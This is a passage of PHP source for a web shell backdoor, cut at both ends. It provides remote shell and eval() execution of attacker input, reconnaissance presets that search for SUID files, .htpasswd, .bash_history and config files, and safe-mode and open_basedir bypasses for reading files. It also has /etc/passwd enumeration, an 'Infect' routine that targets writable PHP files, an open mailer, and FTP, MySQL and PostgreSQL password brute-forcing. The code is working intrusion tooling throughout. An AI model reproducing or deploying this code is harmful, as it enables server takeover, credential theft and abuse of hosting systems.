568 echo '</div>';
569 hardFooter();
570}
571if($os == 'win')
572 $aliases = array(
573 "List Directory" => "dir",
574 "Find index.php in current dir" => "dir /s /w /b index.php",
575 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
576 "Show active connections" => "netstat -an",
577 "Show running services" => "net start",
578 "User accounts" => "net user",
579 "Show computers" => "net view",
580 "ARP Table" => "arp -a",
581 "IP Configuration" => "ipconfig /all"
582 );
583else
584 $aliases = array(
585 "List dir" => "ls -lha",
586 "list file attributes on a Linux second extended file system" => "lsattr -va",
587 "show opened ports" => "netstat -an | grep -i listen",
588 "process status" => "ps aux",
589 "Find" => "",
590 "find all suid files" => "find / -type f -perm -04000 -ls",
591 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
592 "find all sgid files" => "find / -type f -perm -02000 -ls",
593 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
594 "find config.inc.php files" => "find / -type f -name config.inc.php",
595 "find config* files" => "find / -type f -name \"config*\"",
596 "find config* files in current dir" => "find . -type f -name \"config*\"",
597 "find all writable folders and files" => "find / -perm -2 -ls",
598 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
599 "find all service.pwd files" => "find / -type f -name service.pwd",
600 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
601 "find all .htpasswd files" => "find / -type f -name .htpasswd",
602 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
603 "find all .bash_history files" => "find / -type f -name .bash_history",
604 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
605 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
606 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
607 "Locate" => "",
608 "locate httpd.conf files" => "locate httpd.conf",
609 "locate vhosts.conf files" => "locate vhosts.conf",
610 "locate proftpd.conf files" => "locate proftpd.conf",
611 "locate psybnc.conf files" => "locate psybnc.conf",
612 "locate my.conf files" => "locate my.conf",
613 "locate admin.php files" =>"locate admin.php",
614 "locate cfg.php files" => "locate cfg.php",
615 "locate conf.php files" => "locate conf.php",
616 "locate config.dat files" => "locate config.dat",
617 "locate config.php files" => "locate config.php",
618 "locate config.inc files" => "locate config.inc",
619 "locate config.inc.php" => "locate config.inc.php",
620 "locate config.default.php files" => "locate config.default.php",
621 "locate config* files " => "locate config",
622 "locate .conf files"=>"locate '.conf'",
623 "locate .pwd files" => "locate '.pwd'",
624 "locate .sql files" => "locate '.sql'",
625 "locate .htpasswd files" => "locate '.htpasswd'",
626 "locate .bash_history files" => "locate '.bash_history'",
627 "locate .mysql_history files" => "locate '.mysql_history'",
628 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
629 "locate backup files" => "locate backup",
630 "locate dump files" => "locate dump",
631 "locate priv files" => "locate priv"
632 );
633function actionConsole() {
634 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
635 prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
636 $_POST['p1'] .= ' 2>&1';
637 } elseif(!empty($_POST['p1']))
638 prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
639 if(isset($_POST['ajax'])) {
640 prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
641 ob_start();
642 echo "d.cf.cmd.value='';\n";
643 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
644 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
645 if(@chdir($match[1])) {
646 $GLOBALS['cwd'] = @getcwd();
647 echo "c_='".$GLOBALS['cwd']."';";
648 }
649 }
650 echo "d.cf.output.value+='".$temp."';";
651 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
652 $temp = ob_get_clean();
653 echo strlen($temp), "\n", $temp;
654 exit;
655 }
656 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
657 prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
658 hardHeader();
659 echo "<script>
660if(window.Event) window.captureEvents(Event.KEYDOWN);
661var cmds = new Array('');
662var cur = 0;
663function kp(e) {
664 var n = (window.Event) ? e.which : e.keyCode;
665 if(n == 38) {
666 cur--;
667 if(cur>=0)
668 document.cf.cmd.value = cmds[cur];
669 else
670 cur++;
671 } else if(n == 40) {
672 cur++;
673 if(cur < cmds.length)
674 document.cf.cmd.value = cmds[cur];
675 else
676 cur--;
677 }
678}
679function add(cmd) {
680 cmds.pop();
681 cmds.push(cmd);
682 cmds.push('');
683 cur = cmds.length-1;
684}
685</script>";
686 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
687 foreach($GLOBALS['aliases'] as $n => $v) {
688 if($v == '') {
689 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
690 continue;
691 }
692 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
693 }
694
695 echo '</select><input type=submit onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
696 if(!empty($_POST['p1'])) {
697 echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
698 }
699 echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
700 echo '</form></div><script>d.cf.cmd.focus();</script>';
701 hardFooter();
702}
703function actionPhp() {
704 if( isset($_POST['ajax']) ) {
705 $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
706 ob_start();
707 eval($_POST['p1']);
708 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
709 echo strlen($temp), "\n", $temp;
710 exit;
711 }
712 hardHeader();
713 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
714 echo '<h1>PHP info</h1><div class=content>';
715 ob_start();
716 phpinfo();
717 $tmp = ob_get_clean();
718 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
719 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
720 $tmp = preg_replace('!h1!msiU','h2',$tmp);
721 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
722 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
723 echo $tmp;
724 echo '</div><br>';
725 }
726 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
727 $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
728 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
729 echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
730 if(!empty($_POST['p1'])) {
731 ob_start();
732 eval($_POST['p1']);
733 echo htmlspecialchars(ob_get_clean());
734 }
735 echo '</pre></div>';
736 hardFooter();
737}
738function actionMailer() {
739 hardHeader();
740 echo '<h1>E-mail</h1><div class=content>
741 <form method=post><table cellpadding="1" cellspacing="0">
742 <tr><td width="1%">To:</td><td><input type=text name=to value=* style="width:50%"></td></tr>
743 <tr><td>From:</td><td><input type=text name=from value=* style="width:50%"></td></tr></table>';
744 echo '</div>';
745 echo '<h1>Text</h1><div class=content>
746 <input type=text name=subject value=* style="width:100%">
747 <textarea type=text name=body style="margin-top:2px" class=bigarea></textarea>
748 <input type=submit value="Send" style="margin-top:5px"></form>';
749 echo '</div>';
750 hardFooter();
751}
752if (isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['body'])) {
753 $run = 'From: '.$_POST['from'];
754 mail ($_POST['to'],$_POST['subject'],$_POST['body'],$run);
755}
756function actionFilesMan() {
757 if (!empty ($_COOKIE['f']))
758 $_COOKIE['f'] = @unserialize($_COOKIE['f']);
759
760 if(!empty($_POST['p1'])) {
761 switch($_POST['p1']) {
762 case 'uploadFile':
763 if ( is_array($_FILES['f']['tmp_name']) ) {
764 foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {
765 if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {
766 echo "Can't upload file!";
767 }
768 }
769 }
770 break;
771 case 'mkdir':
772 if(!@mkdir($_POST['p2']))
773 echo "Can't create new dir";
774 break;
775 case 'delete':
776 function deleteDir($path) {
777 $path = (substr($path,-1)=='/') ? $path:$path.'/';
778 $dh = opendir($path);
779 while ( ($▟ = readdir($dh) ) !== false) {
780 $▟ = $path.$▟;
781 if ( (basename($▟) == "..") || (basename($▟) == ".") )
782 continue;
783 $type = filetype($▟);
784 if ($type == "dir")
785 deleteDir($▟);
786 else
787 @unlink($▟);
788 }
789 closedir($dh);
790 @rmdir($path);
791 }
792 if(is_array(@$_POST['f']))
793 foreach($_POST['f'] as $f) {
794 if($f == '..')
795 continue;
796 $f = urldecode($f);
797 if(is_dir($f))
798 deleteDir($f);
799 else
800 @unlink($f);
801 }
802 break;
803 case 'paste':
804 if($_COOKIE['act'] == 'copy') {
805 function copy_paste($c,$s,$d){
806 if(is_dir($c.$s)){
807 mkdir($d.$s);
808 $h = @opendir($c.$s);
809 while (($f = @readdir($h)) !== false)
810 if (($f != ".") and ($f != ".."))
811 copy_paste($c.$s.'/',$f, $d.$s.'/');
812 } elseif(is_file($c.$s))
813 @copy($c.$s, $d.$s);
814 }
815 foreach($_COOKIE['f'] as $f)
816 copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
817 } elseif($_COOKIE['act'] == 'move') {
818 function move_paste($c,$s,$d){
819 if(is_dir($c.$s)){
820 mkdir($d.$s);
821 $h = @opendir($c.$s);
822 while (($f = @readdir($h)) !== false)
823 if (($f != ".") and ($f != ".."))
824 copy_paste($c.$s.'/',$f, $d.$s.'/');
825 } elseif(@is_file($c.$s))
826 @copy($c.$s, $d.$s);
827 }
828 foreach($_COOKIE['f'] as $f)
829 @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
830 } elseif($_COOKIE['act'] == 'zip') {
831 if(class_exists('ZipArchive')) {
832 $zip = new ZipArchive();
833 if ($zip->open($_POST['p2'], 1)) {
834 chdir($_COOKIE['c']);
835 foreach($_COOKIE['f'] as $f) {
836 if($f == '..')
837 continue;
838 if(@is_file($_COOKIE['c'].$f))
839 $zip->addFile($_COOKIE['c'].$f, $f);
840 elseif(@is_dir($_COOKIE['c'].$f)) {
841 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
842 foreach ($iterator as $key=>$value) {
843 $zip->addFile(realpath($key), $key);
844 }
845 }
846 }
847 chdir($GLOBALS['cwd']);
848 $zip->close();
849 }
850 }
851 } elseif($_COOKIE['act'] == 'unzip') {
852 if(class_exists('ZipArchive')) {
853 $zip = new ZipArchive();
854 foreach($_COOKIE['f'] as $f) {
855 if($zip->open($_COOKIE['c'].$f)) {
856 $zip->extractTo($GLOBALS['cwd']);
857 $zip->close();
858 }
859 }
860 }
861 } elseif($_COOKIE['act'] == 'tar') {
862 chdir($_COOKIE['c']);
863 $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
864 ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
865 chdir($GLOBALS['cwd']);
866 }
867 unset($_COOKIE['f']);
868 setcookie('f', '', time() - 3600);
869 break;
870 default:
871 if(!empty($_POST['p1'])) {
872 prototype('act', $_POST['p1']);
873 prototype('f', serialize(@$_POST['f']));
874 prototype('c', @$_POST['c']);
875 }
876 break;
877 }
878 }
879 hardHeader();
880 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
881 $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
882 if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; }
883 global $sort;
884 $sort = array('name', 1);
885 if(!empty($_POST['p1'])) {
886 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
887 $sort = array($match[1], (int)$match[2]);
888 }
889echo "<script>
890 function sa() {
891 for(i=0;i<d.files.elements.length;i++)
892 if(d.files.elements[i].type == 'checkbox')
893 d.files.elements[i].checked = d.files.elements[0].checked;
894 }
895</script>
896<table width='100%' class='main' cellspacing='0' cellpadding='2'>
897<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
898 $dirs = $files = array();
899 $n = count($dirContent);
900 for($i=0;$i<$n;$i++) {
901 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
902 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
903 $tmp = array('name' => $dirContent[$i],
904 'path' => $GLOBALS['cwd'].$dirContent[$i],
905 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
906 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
907 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
908 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
909 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
910 );
911 if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
912 $files[] = array_merge($tmp, array('type' => 'file'));
913 elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
914 $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
915 elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i]))
916 $dirs[] = array_merge($tmp, array('type' => 'dir'));
917 }
918 $GLOBALS['sort'] = $sort;
919 function cmp($a, $b) {
920 if($GLOBALS['sort'][0] != 'size')
921 return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
922 else
923 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
924 }
925 usort($files, "cmp");
926 usort($dirs, "cmp");
927 $files = array_merge($dirs, $files);
928 $l = 0;
929 foreach($files as $f) {
930 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
931 .'</td><td><a class="tooltip" data-tooltip="Rename" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a class="tooltip" data-tooltip="Touch" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a class="tooltip" data-tooltip="Edit" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a class="tooltip" data-tooltip="Download" href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
932 $l = $l?0:1;
933 }
934 echo "<tr id=fak><td colspan=7>
935 <input type=hidden name=ne value=''>
936 <input type=hidden name=a value='FilesMan'>
937 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
938 <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
939 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
940 if(class_exists('ZipArchive'))
941 echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>";
942 echo "<option value='tar'>+ tar.gz</option>";
943 if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
944 echo "<option value='paste'>↳ Paste</option>";
945 echo "</select>";
946 if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
947 echo " file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'> ";
948 echo "<input type='submit' value='>>'></td></tr></form></table></div>";
949 hardFooter();
950}
951function actionStringTools() {
952 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
953 if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
954 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
955 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
956 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
957 $stringTools = array(
958 'Base64 encode' => 'base64_encode',
959 'Base64 decode' => 'base64_decode',
960 'Url encode' => 'urlencode',
961 'Url decode' => 'urldecode',
962 'Full urlencode' => 'full_urlencode',
963 'md5 hash' => 'md5',
964 'sha1 hash' => 'sha1',
965 'crypt' => 'crypt',
966 'CRC32' => 'crc32',
967 'ASCII to HEX' => 'ascii2hex',
968 'HEX to ASCII' => 'hex2ascii',
969 'HEX to DEC' => 'hexdec',
970 'HEX to BIN' => 'hex2bin',
971 'DEC to HEX' => 'dechex',
972 'DEC to BIN' => 'decbin',
973 'BIN to HEX' => 'binhex',
974 'BIN to DEC' => 'bindec',
975 'String to lower case' => 'strtolower',
976 'String to upper case' => 'strtoupper',
977 'Htmlspecialchars' => 'htmlspecialchars',
978 'String length' => 'strlen',
979 );
980 if(isset($_POST['ajax'])) {
981 prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
982 ob_start();
983 if(in_array($_POST['p1'], $stringTools))
984 echo $_POST['p1']($_POST['p2']);
985 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
986 echo strlen($temp), "\n", $temp;
987 exit;
988 }
989 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
990 prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
991 hardHeader();
992 echo '<h1>String conversions</h1><div class=content>';
993 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
994 foreach($stringTools as $k => $v)
995 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
996 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
997 if(!empty($_POST['p1'])) {
998 if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
999 }
1000 echo"</pre></div><br><h1>Search files:</h1><div class=content>
1001 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
1002 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
1003 <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
1004 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
1005 <tr><td></td><td><input type='submit' value='>>'></td></tr>
1006 </table></form>";
1007 function hardRecursiveGlob($path) {
1008 if(substr($path, -1) != '/')
1009 $path.='/';
1010 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
1011 if(is_array($paths)&&@count($paths)) {
1012 foreach($paths as $▟) {
1013 if(@is_dir($▟)){
1014 if($path!=$▟)
1015 hardRecursiveGlob($▟);
1016 } else {
1017 if(empty($_POST['p2']) || @strpos(file_get_contents($▟), $_POST['p2'])!==false)
1018 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($▟)."\", \"view\",\"\")'>".htmlspecialchars($▟)."</a><br>";
1019 }
1020 }
1021 }
1022 }
1023 if(@$_POST['p3'])
1024 hardRecursiveGlob($_POST['c']);
1025 echo "</div><br><h1>Search for hash:</h1><div class=content>
1026 <form method='post' target='_blank' name='hf'>
1027 <input type='text' name='hash' style='width:200px;'><br>
1028 <input type='hidden' name='act' value='find'/>
1029 <input type='submit' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
1030 <input type='submit' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
1031 <input type='submit' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
1032 <input type='submit' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
1033 <input type='submit' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br>
1034 <input type='submit' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
1035 <input type='submit' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br>
1036 </form></div>";
1037 hardFooter();
1038}
1039function actionSafeMode() {
1040 $temp='';
1041 ob_start();
1042 switch($_POST['p1']) {
1043 case 1:
1044 $temp=@tempnam($test, 'cx');
1045 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
1046 echo @file_get_contents($temp);
1047 unlink($temp);
1048 } else
1049 echo 'Sorry... Can\'t open file';
1050 break;
1051 case 2:
1052 $files = glob($_POST['p2'].'*');
1053 if( is_array($files) )
1054 foreach ($files as $filename)
1055 echo $filename."\n";
1056 break;
1057 case 3:
1058 $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
1059 curl_exec($ch);
1060 break;
1061 case 4:
1062 ini_restore("safe_mode");
1063 ini_restore("open_basedir");
1064 include($_POST['p2']);
1065 break;
1066 case 5:
1067 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
1068 $uid = @posix_getpwuid($_POST['p2']);
1069 if ($uid)
1070 echo join(':',$uid)."\n";
1071 }
1072 break;
1073 case 6:
1074 if(!function_exists('imap_open'))break;
1075 $stream = imap_open($_POST['p2'], "", "");
1076 if ($stream == FALSE)
1077 break;
1078 echo imap_body($stream, 1);
1079 imap_close($stream);
1080 break;
1081 }
1082 $temp = ob_get_clean();
1083 hardHeader();
1084 echo '<h1>Safe mode bypass</h1><div class=content>';
1085 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
1086 if($temp)
1087 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
1088 echo '</div>';
1089 hardFooter();
1090}
1091function actionLogout() {
1092 setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
1093 die('bye!');
1094}
1095function actionSelfRemove() {
1096 if($_POST['p1'] == 'yes')
1097 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
1098 die('Shell has been removed');
1099 else
1100 echo 'unlink error!';
1101 if($_POST['p1'] != 'yes')
1102 hardHeader();
1103 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1104 hardFooter();
1105}
1106function actionInfect() {
1107 hardHeader();
1108 echo '<h1>Infect</h1><div class=content>';
1109 if($_POST['p1'] == 'infect') {
1110 $target=$_SERVER['DOCUMENT_ROOT'];
1111 function ListFiles($dir) {
1112 if($dh = opendir($dir)) {
1113 $files = Array();
1114 $inner_files = Array();
1115 while($file = readdir($dh)) {
1116 if($file != "." && $file != "..") {
1117 if(is_dir($dir . "/" . $file)) {
1118 $inner_files = ListFiles($dir . "/" . $file);
1119 if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1120 } else {
1121 array_push($files, $dir . "/" . $file);
1122 }
1123 }
1124 }
1125 closedir($dh);
1126 return $files;
1127 }
1128 }
1129 foreach (ListFiles($target) as $key=>$file){
1130 $nFile = substr($file, -4, 4);
1131 if($nFile == ".php" ){
1132 if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){
1133 echo "$file<br>";
1134 $i++;
1135 }
1136 }
1137 }
1138 echo "<font color=red size=14>$i</font>";
1139 }else{
1140 echo "<form method=post><input type=submit value=Infect name=infet></form>";
1141 echo 'Really want to infect the server? <a href=# onclick="g(null,null,\'infect\')">Yes</a></div>';
1142 }
1143 hardFooter();
1144}
1145function actionBruteforce() {
1146 hardHeader();
1147 if( isset($_POST['proto']) ) {
1148 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1149 if( $_POST['proto'] == 'ftp' ) {
1150 function bruteForce($ip,$port,$login,$pass) {
1151 $fp = @ftp_connect($ip, $port?$port:21);
1152 if(!$fp) return false;
1153 $res = @ftp_login($fp, $login, $pass);
1154 @ftp_close($fp);
1155 return $res;
1156 }
1157 } elseif( $_POST['proto'] == 'mysql' ) {
1158 function bruteForce($ip,$port,$login,$pass) {
1159 $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass);
1160 @mysql_close($res);
1161 return $res;
1162 }
1163 } elseif( $_POST['proto'] == 'pgsql' ) {
1164 function bruteForce($ip,$port,$login,$pass) {
1165 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
1166 $res = @pg_connect($str);
1167 @pg_close($res);
1168 return $res;
1169 }
1170 }
1171 $success = 0;
1172 $attempts = 0;
1173 $server = explode(":", $_POST['server']);
1174 if($_POST['type'] == 1) {
1175 $temp = @file('/etc/passwd');
1176 if( is_array($temp) )
1177 foreach($temp as $line) {
1178 $line = explode(":", $line);
1179 ++$attempts;
1180 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1181 $success++;
1182 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1183 }
1184 if(@$_POST['reverse']) {
1185 $tmp = "";
1186 for($i=strlen($line[0])-1; $i>=0; --$i)
1187 $tmp .= $line[0][$i];
1188 ++$attempts;
